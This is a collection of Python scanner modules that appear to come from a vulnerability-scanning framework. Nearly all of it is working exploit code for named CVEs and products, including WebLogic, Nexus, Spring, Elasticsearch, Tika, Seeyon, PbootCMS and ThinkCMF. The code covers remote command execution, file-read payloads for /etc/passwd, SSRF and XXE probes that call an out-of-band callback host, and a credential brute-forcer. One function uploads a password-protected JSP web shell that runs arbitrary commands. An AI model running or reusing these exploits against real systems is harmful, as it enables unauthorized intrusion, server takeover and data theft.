async def prove(self):
# socks proxy
proxy = 'socks5://{}:{}'.format(self.target_host,
str(self.target_port))
connector = SocksConnector.from_url(proxy)
url = self.ceye_dns_api(t='url')
async with ClientSession(connector=connector) as session:
async with session.options(url=url) as res1:
if res1:
text1 = await res1.text()
if 'HTTP Record Insert Success' in text1:
self.flag = 1
self.res.append({"info": proxy, "key": "proxy unauth"})
return
# http proxy
proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port))
async with ClientSession() as session:
async with session.get(url=url, proxy=proxy) as res2:
if res2:
text2 = await res2.text()
if 'HTTP Record Insert Success' in text2:
self.flag = 1
self.res.append({"info": proxy, "key": "proxy unauth"})
return
async def prove(self):
# socks proxy
proxy = 'socks5://{}:{}'.format(self.target_host, str(self.target_port))
connector = SocksConnector.from_url(proxy)
url = 'http://example.com/'
async with ClientSession(connector=connector) as session:
async with session.get(url=url) as res1:
if res1:
text1 = await res1.text()
if 'More information...' in text1:
self.flag = 1
self.res.append({"info": proxy, "key": "proxy unauth"})
return
# http proxy
proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port))
async with ClientSession() as session:
async with session.get(url=url, proxy=proxy) as res2:
if res2:
text2 = await res2.text()
if 'More information...' in text2:
self.flag = 1
self.res.append({"info": proxy, "key": "proxy unauth"})
return
async def _zoomeye_api(search, page, z_type):
"""
app:"Drupal" country:"JP"
curl -X POST https://api.zoomeye.org/user/login -d '
{
"username": "******",
"password": "******"
}'
"""
headers = {}
url_login = '******'
try:
data = {
'username': conf['zoomeye_api']['username'],
'password': conf['zoomeye_api']['password']
}
async with ClientSession() as session:
async with session.post(url=url_login, json=data, headers=headers) as response:
if response:
res = await response.text()
headers["Authorization"] = "JWT " + json.loads(res)['access_token']
except KeyError:
sys.exit(logger.error("Load tentacle config error: zoomeye_api, please check the config in tentacle.conf."))
except AttributeError as e :
sys.exit(logger.error("Zoomeye api error: the response is none."))
except Exception as e:
sys.exit(logger.error("Zoomeye api error: %s" %type(e).__name__))
if z_type.lower() == 'web':
url_api = "https://api.zoomeye.org/web/search"
elif z_type.lower() == 'host':
url_api = "https://api.zoomeye.org/host/search"
else:
url_api = None
logger.error("Error zoomeye api with type {0}.".format(z_type))
yield None
logger.sysinfo("Using zoomeye api with type {0}.".format(z_type))
async with ClientSession() as session:
for n in range(1, page+1):
logger.debug("Find zoomeye url of %d page..." % int(n))
try:
data = {'query': search, 'page': str(n)}
async with session.get(url=url_api, params=data, headers=headers) as response:
if response:
res = await response.text()
if int(response.status) == 422:
sys.exit(logger.error("Error zoomeye api token."))
if z_type.lower() == 'web':
result = re.compile('"url": "(.*?)"').findall(res)
elif z_type.lower() == 'host':
result = [str(item['ip']) + ':' + str(item['portinfo']['port']) for item in json.loads(res)['matches']]
logger.debug("Zoomeye Found: %s" % result)
yield result
except Exception:
yield []
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
]))
async with ClientSession() as session:
for path in path_list:
url = path + "index.php?g=Api&m=Plugin&a=fetch"
_data = "templateFile=/../../../public/index&prefix=''&content=<php>file_put_contents('bytestforme2.php','<?php phpinfo();')</php>"
async with session.post(url=url, data=_data) as res:
if res != None and res.status == 200:
async with session.get(url=path +
"/bytestforme2.php") as res:
if res != None and res.status == 200:
text = await res.text()
if 'php.ini' in text:
self.flag = 1
self.req.append({"flag": url})
self.res.append({
"info":
url,
"key":
"thinkcmf 2.2.3 template inject"
})
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '/nexus3/'),
]))
async with ClientSession() as session:
for path in path_list:
url = path + 'service/extdirect'
headers = {"Content-Type": "application/json"}
dns = self.ceye_dns_api(k='cve20197328', t='dns')
cmd = 'ping ' + dns
data = '{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName(\'java.lang.Runtime\').getRuntime().exec(' + cmd + ').waitFor()".format(self.BANNER, self.DOMAIN)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}'
async with session.post(url=url,
json=data,
headers=headers) as res:
await asyncio.sleep(1)
if await self.ceye_verify_api(dns, t='dns'):
self.flag = 1
self.res.append({
"info": url,
"key": "CVE-2019-7238"
})
return
async def prove(self):
await self.get_url()
if self.base_url:
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
url = self.base_url + 'console/css/%252e%252e%252fconsole.portal'
async with ClientSession() as session:
async with session.get(url=url,
headers=headers,
allow_redirects=False) as res:
if res != None and res.status == 302:
cookies = res.cookies
async with session.get(url=url,
cookies=cookies,
headers=headers,
allow_redirects=False) as res:
if res != None and res.status != 404:
text = await res.text()
if ('base_domain' in text and
'SecurityRealmRealmTablePage' in text
) or ('Home Page' in text
or 'WebLogic Server Console' in text
and 'console.portal' in text):
self.flag = 1
self.res.append({
"info":
url,
"key":
"weblogic CVE-2020-14750"
})
return
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
self.url_normpath(self.url, '')
]))
async with ClientSession() as session:
for path in path_list:
datas = [
'username[(#root.getClass().forName("java.lang.ProcessBuilder").getConstructor(\'foo\'.split('
').getClass()).newInstance(\'ecxxho%20springxx_test\'.split(\'xx\'))).start()]=test',
'username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\'echo%20spring_test\')")]=test',
'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("echo%20spring_test")]=test'
]
for _data in datas:
async with session.get(
url=path,
data=_data,
) as res:
if res:
text = await res.text()
if "spring_test" in text:
self.flag = 1
self.res.append({
"info":
path,
"key":
"Spring RCE CVE-2018-1273"
})
break
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '../wordpress/'),
self.url_normpath(self.url, './'),
]))
async with ClientSession() as session:
for path in path_list:
dns = self.ceye_dns_api(k='xmlrpc', t='dns')
url = path + 'xmlrpc.php'
headers = {"Content-Type": "text/xml"}
data = '''<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://{dns}/</string></value></param>
<param><value><string>{path}?p=1</string></value></param>
</params>
</methodCall>'''.format(dns=dns, path=path)
async with session.post(url=url,
data=data,
headers=headers) as res:
if res != None:
await asyncio.sleep(1)
if await self.ceye_verify_api(dns, 'dns'):
self.flag = 1
self.req.append({"url": url})
self.res.append({
"info": url,
"key": "wordpress xmlrpc ssrf"
})
break
async def prove(self):
await self.get_url()
if self.base_url:
table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
test_file = 'test' + str(random.randint(100000, 999999)) + '.txt'
base64_file = str(
base64encode(
'..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
test_file), table))
url = self.base_url + 'seeyon/htmlofficeservlet'
async with ClientSession() as session:
async with session.get(url=url) as response:
if response != None:
text = await response.text()
if 'DBSTEP V3.0' in text:
data = '''DBSTEP V3.0 355 0 22 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format(
base64_file)
async with session.post(url=url,
data=data) as response2:
# print(self.base_url + 'seeyon/' + test_file)
await asyncio.sleep(1)
url1 = self.base_url + 'seeyon/' + test_file
async with session.get(url=url1) as response2:
if response2 != None:
text2 = await response2.text()
if 'this is a test for me' in text2:
self.flag = 1
self.res.append({
"info":
url1,
"key":
'seeyon getshell'
})
async def _google_api(search, page):
'''
https://console.developers.google.com
https://developers.google.com/custom-search/v1/cse/list
poc-t search_enging 011385053819762433240:ljmmw2mhhau
https://cse.google.com.hk/cse?cx=011385053819762433240:ljmmw2mhhau&gws_rd=cr
'''
try:
developer_key = conf['google_api']['developer_key']
search_enging= conf['google_api']['search_enging']
except KeyError:
sys.exit(logger.error("Load tentacle config error: google_api, please check the config in tentacle.conf."))
async with ClientSession() as session:
for p in range(0,page):
base_url = 'https://www.googleapis.com/customsearch/v1?cx={0}&key={1}&num=10&start={2}&q={3}'.format(search_enging,developer_key,str(p * 10 +1),search)
async with session.get(url=base_url) as response:
if response:
res = await response.text()
if int(response.status) == 200:
res_json = json.loads(res)
try:
for item in res_json.get('items'):
yield item.get('link')
except:
break
else:
logger.error("Error google api access, and api rate limit 100/day, maybe you should pay money and enjoy service.")
break
async def prove(self):
await self.get_url()
if self.base_url:
xmldata = '''
<?xml version="1.0" encoding="UTF-8"?>
<root>
dGVzdCBieSBtZQ==
</root>
'''
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '../ucms/'),
self.url_normpath(self.url, 'ucms/'),
self.url_normpath(self.url, '../ucms/'),
]))
async with ClientSession() as session:
for path in path_list:
myurl = path + 'cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx'
async with session.post(url=myurl, data=xmldata) as res:
if res != None and res.status is 200:
myurl = path + 'cms-data/temp_dir/xxxx/temp.files/justfortest.jsp'
async with session.post(url=myurl,
data=xmldata) as res:
if res != None:
text = await res.text()
if 'test by me' in text:
self.flag = 1
self.req.append({"page": myurl})
self.res.append({
"info": myurl,
"key": "ucms upload"
})
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
]))
async with ClientSession() as session:
for path in path_list:
payload = (
("SAVE_CONFIG", "1"), ("PDF_Directory", "/var/www/html/flex2.3.6/flexpaper/pdf"),
("SWF_Directory", "config/"),
("LICENSEKEY", ""), ("splitmode", "1"), ("RenderingOrder_PRIM", "flash"), ("RenderingOrder_SEC", "html"))
shellcode = "%65%63%68%6f%20%50%44%39%77%61%48%41%67%63%47%68%77%61%57%35%6d%62%79%67%70%4f%7a%38%2b%20%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%65%73%74%66%6f%72%6d%65%2e%70%68%70"
url1 = path + "flexpaper/php/change_config.php"
url2 = path + "flexpaper/php/setup.php?step=2&PDF2SWF_PATH=" + shellcode
url3 = path + 'flexpaper/php/testforme.php'
async with session.post(url=url1, data=payload) as res1:
if res1 != None and res1.status == 200:
async with session.get(url=url2) as res2:
if res2 != None and res2.status == 200:
async with session.get(url=url3) as res3:
if res3 != None:
text3 = await res3.text()
if "php.ini" in text3:
self.flag = 1
self.req.append({"url": url3})
self.res.append({"info": url3, "key": "flexpaper_236_getshell"})
return
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
]))
async with ClientSession() as session:
for path in path_list:
dns = self.ceye_dns_api(t='url')
url = path + "plugin.php?id=wechat:wechat&ac=wxregister&username=vov&avatar=%s&wxopenid=%s" % (
dns, ''.join(
[random.choice(ascii_lowercase)
for _ in range(8)]))
async with session.get(url=url) as res:
if res != None:
await asyncio.sleep(1)
if await self.ceye_verify_api(dns, 'http'):
self.flag = 1
self.req.append({"flag": url})
self.res.append({
"info": url,
"key": "discuz x3.4 ssrf"
})
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
self.url_normpath(self.url, '../'),
]))
async with ClientSession() as session:
for path in path_list:
url = path + "kindeditor/php/upload_json.php?dir=file"
data = FormData()
data.add_field('imgFile',
"this is a test for you. ",
filename='mytestforyou.html',
content_type='text/plain')
async with session.post(url=url, data=data) as res:
if res != None:
text = await res.text()
try:
res = json.loads(text)
if 'url' in res.keys(
) and 'kindeditor' in res['url']:
self.flag = 1
self.req.append({"url": url})
self.res.append({"info": url, "key": url})
except:
pass
async def prove(self):
'''
其中JAVA等价于:
String s1 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).useDelimiter("\\A").next();
//A means "start of string", and \z means "end of string".
String s2 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).next();
System.out.println(s1)
'''
await self.get_url()
if self.base_url:
ran = str(random.randint(100000, 999999))
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
_data = '''
{
"size":1,
"script_fields": {
"test#": {
"script":
"java.lang.Math.class.forName(\\"java.io.BufferedReader\\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"echo '''+ ran + '''\\").getInputStream())).readLines()",
"lang": "groovy"
}
}
}
'''
async with ClientSession() as session:
url = self.base_url + '_search?pretty'
async with session.post(url=url, headers=headers, data=_data) as res:
if res != None:
text = await res.text()
if ran in text:
self.flag = 1
self.req.append({"url": url})
self.res.append({"info": url, "key": "CVE-2015-1427"})
async def prove(self):
await self.get_url()
if self.base_url:
path = self.base_url
async with ClientSession() as session:
new_path = await self.get_new_work_path(session, path)
flag = await self.set_new_upload_path(session, path, new_path)
if flag:
form = aiohttp.FormData()
form.add_field('ks_edit_mode', 'false')
form.add_field('ks_password_front', 'mytest')
form.add_field('ks_password_changed', 'true')
form.add_field('ks_filename', prove_content, filename="myTestFile.txt",content_type='application/octet-stream')
async with session.post(url=path + "ws_utc/resources/setting/keystore", data=form) as res:
if res:
text = await res.text()
match = re.findall("<id>(.*?)</id>", text)
if match:
tid = match[-1]
shell_path = self.base_url + "ws_utc/css/config/keystore/" + str(tid) + "_myTestFile.txt"
async with session.get(url=shell_path, headers=headers) as res:
if res:
text = await res.text()
if upload_content in text:
self.flag = 1
self.res.append({"info": shell_path, "key": "CVE-2018-2894"})
async def prove(self):
await self.get_url()
if self.base_url:
dns = self.ceye_dns_api(k='fjinfo', t='dns')
# logger.sysinfo(dns + ' ------- '+ self.base_url)
async with ClientSession() as session:
pocs = [
{
"test": {
"@type": "java.net.Inet4Address",
"val": dns
}
},
{
"test": {
"@type": "java.net.Inet6Address",
"val": dns
}
},
]
for poc in pocs:
for url in self.url_normpath(self.url, './'):
try:
async with session.post(url=url, json=poc) as res:
pass
except:
pass
if await self.ceye_verify_api(dns, 'dns'):
self.flag = 1
self.res.append({"info": url, "key": dns})
async def _fofa_api(search, page, flag = True):
'''
https://fofa.so/api#auth
'''
url_login = '******'
try:
email = conf['fofa_api']['email']
key = conf['fofa_api']['token']
except KeyError:
sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
if flag:
logger.sysinfo("Using fofa api...")
search = str(base64encode(search))
async with ClientSession() as session:
for p in range(1,page+1):
logger.debug("Find fofa url of %d page..." % int(p))
async with session.post(url=url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search)) as response:
if response !=None:
if int(response.status) == 401:
sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
else:
res = await response.text()
if res !=None:
res_json = json.loads(res)
if res_json["error"] is None:
if len(res_json.get('results')) == 0:
break
for item in res_json.get('results'):
logger.debug("Fofa Found: %s" % item[0])
yield item[0]
async def upload(self):
await self.get_url()
if self.base_url:
table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
test_file = 'test' + str(random.randint(100000, 999999)) + '.jsp'
base64_file = str(
base64encode(
'..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
test_file), table))
url = self.base_url + 'seeyon/htmlofficeservlet'
async with ClientSession() as session:
async with session.get(url=url) as response:
if response != None:
text = await response.text()
if 'DBSTEP V3.0' in text:
data = '''DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=''' + base64_file + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2'''
async with session.post(url=url,
data=data) as response:
await asyncio.sleep(1)
url1 = self.base_url + 'seeyon/' + test_file
async with session.get(url=url1) as response1:
if response1 != None:
text1 = await response1.text()
if ':-)' in text1:
self.flag = 1
self.res.append({
"info":
url1 + '?pwd=test12345&cmd=whoami',
"key":
'seeyon getshell'
})
async def prove(self):
await self.get_url()
if self.base_url:
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
usernamedic = self.read_file(
self.parameter['U']) if 'U' in self.parameter.keys(
) else self.read_file(
os.path.join(paths.DICT_PATH, 'weblogic_usernames.txt'))
passworddic = self.read_file(
self.parameter['P']) if 'P' in self.parameter.keys(
) else self.read_file(
os.path.join(paths.DICT_PATH, 'weblogic_passwords.txt'))
url = self.base_url + 'console/j_security_check'
async with ClientSession() as session:
async for (username, password) in self.generate_dict(
usernamedic,
passworddic): # 登陆失败错误过多会锁账户,不建议尝试爆破过多,5次以下差不多
data = 'j_username={}&j_password={}&j_character_encoding=UTF-8'.format(
username, password)
async with session.post(url=url,
data=data,
headers=headers,
allow_redirects=False) as res:
if res != None and res.status == 302:
location = res.headers.get('Location', '')
if '/console' in location and '/login/LoginForm.jsp' not in location:
# if ('Home Page' in text or 'WebLogic Server Console' in text and 'console.portal' in text):
self.flag = 1
self.res.append({
"info": username + "/" + password,
"key": "weblogic burst"
})
return
async def prove(self):
await self.get_url()
if self.base_url:
headers = {"Content-Type": "application/x-www-form-urlencoded"}
async with ClientSession() as session:
for path in self.url_normpath(self.url, [
'./phpMyAdmin/',
'./pma/',
'/phpmyadmin/',
'./',
]):
url = path + 'scripts/setup.php'
datas = [
'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}',
'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:18:"C:\\Windows\\win.ini";}'
]
for data in datas:
async with session.post(url=url,
headers=headers,
data=data,
allow_redirects=False) as res:
if res:
text = await res.text()
if 'root:' in text or '[extensions]' in text:
self.flag = 1
self.res.append({
"info":
url,
"key":
"phpmyadmin_setup_deserialization"
})
return
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
self.url_normpath(self.url, '')
]))
async with ClientSession() as session:
for path in path_list:
headers = {
"Content-Type": "application/json-patch+json",
}
datas = [
'[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))/foo"}]',
'[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))[foo]"}]'
]
for _data in datas:
async with session.patch(url=path,
data=_data,
headers=headers) as res:
if res:
text = await res.text()
if "SpelEvaluation" in text:
self.flag = 1
self.res.append({
"info":
path,
"key":
"Spring RCE CVE-2017-8046"
})
break
async def prove(self):
await self.get_url()
if self.base_url:
path_list = list(set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '../PbootCMS/'),
self.url_normpath(self.url, 'PbootCMS/'),
self.url_normpath(self.url, '../PbootCMS/'),
]))
async with ClientSession() as session:
for path in path_list:
for poc in [
"index.php/index/index?keyword={pboot:if(eval($_REQUEST[1]));//)})}}{/pboot:if}&1=phpinfo();"
"index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
"index.php/Content/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
"index.php/List/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
"index.php/About/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
"index.php/Search/index?keyword={pboot:if(1)$a=$_GET[title];$a();//)})}}{/pboot:if}&title=phpinfo"
]:
url = path + poc
async with session.get(url=url) as res:
if res !=None:
text = await res.text()
if "php.ini" in text:
self.flag = 1
self.req.append({"url": url})
self.res.append({"info": url, "key": "pbootcms v1.3.2 rec"})
break
async def prove(self):
await self.get_url()
if self.base_url != None:
path_list = list(
set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
]))
async with ClientSession() as session:
for path in path_list:
async with session.options(url=path +
"testbyme") as response:
if response != None and 'Allow' in response.headers and 'PUT' in response.headers[
'Allow']:
for _url in [
str(int(time.time())) + '.jsp/',
str(int(time.time())) + '.jsp::$DATA',
str(int(time.time())) + '.jsp%20'
]:
url = path + _url
async with session.put(
url=url, data='test') as response:
if response != None:
if response.status == 201 or response.status == 204:
self.flag = 1
self.req.append({"method": "put"})
self.res.append({
"info": url,
"key": "PUT"
})
async def prove(self):
await self.get_url()
if self.base_url:
async with ClientSession() as session:
dns = self.ceye_dns_api(t='url')
for path in [self.base_url, self.base_url + "solr/"]:
url = path + 'admin/cores?wt=json'
async with session.get(url=url,
allow_redirects=False) as res:
if res and res.status == 200:
text = await res.text()
if 'responseHeader' in text:
matchObj = re.search(r'"name":"(?P<core>.*?)"',
text)
if matchObj:
name = matchObj.group(1)
url1 = path + name + '/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{dns}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser'.format(
dns=dns)
async with session.get(url=url1) as res1:
if res1:
if await self.ceye_verify_api(
dns, 'http'):
self.flag = 1
self.res.append({
"info":
url,
"key":
"CVE-2017-12629"
})
return
async def prove(self):
await self.get_url()
if self.url :
async with ClientSession() as session:
webkeydic = self.read_file(self.parameter['keyword'],'rb') if 'keyword' in self.parameter.keys() else self.read_file('dict/web_content_key.txt', 'rb')
async with session.get(url=self.url) as response:
if response is not None :
res = await response.read()
try:
res = str(res, 'utf-8')
except UnicodeDecodeError:
res = str(res, 'gbk')
except:
res = "[Error Code]"
m = re.search('<title>(.*)<\/title>', res.lower())
if m != None and m.group(1):
title = m.group(1)
else:
title = '[None Title]'
key = ''
for searchkey in webkeydic:
searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "")
try:
if searchkey in res:
key += searchkey + ','
self.flag = 1
except Exception as e:
print(e)
pass
if self.flag == 1:
self.res.append({"info": title, "key": key[:-1]})
async def exec(self):
await self.get_url()
if self.base_url:
headers = {
"X-Tika-OCRTesseractPath": "\"cscript\"",
"X-Tika-OCRLanguage": "//E:Jscript",
"Expect": "100-continue",
"Content-type": "image/jp2",
"Connection": "close"
}
url = self.base_url + "meta"
jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c {}');
'''.format(self.parameter['cmd'])
async with ClientSession() as session:
async with session.put(url=url, headers=headers,
data=jscript) as res:
if res != None:
text = await res.text()
if res != None and "X-Parsed-By" in text and "tika.parse" in text:
self.flag = 1
self.req.append({"flag": url})
self.res.append({
"info": text,
"key": "Apache Tika-server RCE"
})
async def prove(self):
await self.get_url()
if self.base_url:
PAYLOADS = (
re.compile(r'<title>Index of /', re.I),
re.compile(r'<a href="?C=N;O=D">Name</a>', re.I),
re.compile(r'<A HREF="?M=A">Last modified</A>', re.I),
re.compile(r'Last modified</a>', re.I),
re.compile(r'Parent Directory</a>', re.I),
re.compile(r'<TITLE>Folder Listing.', re.I),
re.compile(r'<table summary="Directory Listing', re.I),
re.compile(r'">[To Parent Directory]</a><br><br>', re.I),
re.compile(r'<dir> <A HREF="/', re.I),
re.compile(r'''<pre><A HREF="/">\[''', re.I),
)
async with ClientSession() as session:
path_list = list(set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.url, './'),
self.url_normpath(self.url, '../'),
]))
for path in path_list:
url = path
async with session.get(url=url) as response:
if response and response.status==200:
text = str(await response.read())
for payload in PAYLOADS:
r = payload.findall(text)
if r:
self.flag = 1
self.res.append({"info": url, "key": "directory_list"})
return
async def prove(self):
await self.get_url()
if self.base_url:
async with ClientSession() as session:
for path in self.url_normpath(self.url, './'):
pocs = [
"wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt",
"wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt"
]
for poc in pocs:
url = path + poc
async with session.get(url=url) as res:
if res != None and res.status == 200:
text = await res.text()
if 'id' in text and 'filepath' in text and 'name' in text:
file_id = json.loads(text).get('id', '')
if file_id:
url2 = path + 'file/fileNoLogin/' + str(
file_id)
async with session.get(
url=url2) as res2:
if res2 != None and res2.status == 200:
text2 = await res2.text()
if '[extensions]' in text2 or 'root:x:' in text2:
self.flag = 1
self.req.append(
{"url": url2})
self.res.append({
"info":
url,
"key":
"weaver e-bridge lfl"
})
return
async def prove(self):
await self.get_url()
if self.base_url != None:
async with ClientSession() as session:
for url in [self.base_url, self.base_url + "docs/", self.base_url + "manager/",
self.base_url + "examples/",
self.base_url + "host-manager/"]:
async with session.get(url=url) as res:
if res:
text = await res.text()
if res.status == 200 and 'Apache Tomcat Examples' in text:
self.flag = 1
self.req.append({"page": 'tomcat page'})
self.res.append({"info": url, "key": "tomcat page"})
elif res.status == 401 and '401 Unauthorized' in text and 'tomcat' in text:
self.flag = 1
self.req.append({"page": 'tomcat page'})
self.res.append({"info": url, "key": "tomcat page"})
elif res.status == 403 and '403 Access Denied' in text and 'tomcat-users' in text:
self.flag = 1
self.req.append({"page": 'tomcat page'})
self.res.append({"info": url, "key": "tomcat page"})
elif res.status == 200 and 'Documentation' in text and 'Apache Software Foundation' in text and 'tomcat' in text:
self.flag = 1
self.req.append({"page": 'tomcat page'})
self.res.append({"info": url, "key": "tomcat page"})
